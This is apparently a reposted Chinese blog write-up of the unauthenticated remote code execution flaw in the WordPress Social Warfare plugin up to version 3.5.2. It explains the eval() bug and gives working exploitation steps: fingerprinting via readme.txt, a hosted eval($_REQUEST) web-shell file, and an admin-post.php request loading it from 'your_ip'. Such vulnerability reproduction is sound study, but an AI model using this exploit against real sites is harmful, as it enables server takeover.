WordPress插件Social Warfare<=3.5.2 无需登录RCE漏洞

Posted dgjnszf

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了WordPress插件Social Warfare<=3.5.2 无需登录RCE漏洞相关的知识,希望对你有一定的参考价值。

  该漏洞只存在于Social Warfare插进的3.5.03.5.13.5.2版本中,其他版本不存在。

  2019年3月21日插件作者紧急发布了3.5.3版本以修复高危的RCE漏洞,在<=3.5.2版本中存在一处无需登录即可getshell的RCE漏洞。

技术图片

漏洞分析

在/wp-content/plugins/social-warfare/lib/utilities/SWP_Database_Migration.php文件中有一处eval()函数,该函数将file_get_contents()读取的文件内容当做PHP代码执行导致RCE。

技术图片

漏洞利用

第一步:刺探是否安装了Social Warfare插件

访问http://127.0.0.1/wp-content/plugins/social-warfare/readme.txt,如果存在readme.txt文件则说明已经安装该插件,并且从该txt文件中可获知插件的版本。

我的本机环境为3.5.2版本。

技术图片

第二步:在自己的VPS服务器上放置一个code.txt文件,并启动HTTP服务使该文件可通过HTTP访问。文件内容如下:

<pre>eval($_REQUEST[‘wpaa‘])</pre>

 第三步:在未登陆任何账号的情况下直接访问如下链接即可getshell。

http://127.0.0.1//wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://your_ip/code.txt&wpaa=phpinfo();

技术图片

 

以上是关于WordPress插件Social Warfare<=3.5.2 无需登录RCE漏洞的主要内容,如果未能解决你的问题,请参考以下文章

WordPress Social Warfare组件 远程代码漏洞执行详细复现

php 使用Genesis钩子显示基于SW设置的Social Warfare图标。

markdown Authenticate - Flow Flow Social Streams WordPress插件

社交计数 wordpress 插件

博客 Social Network Connect 与 AJAX 的集成

WordPress wp-load.php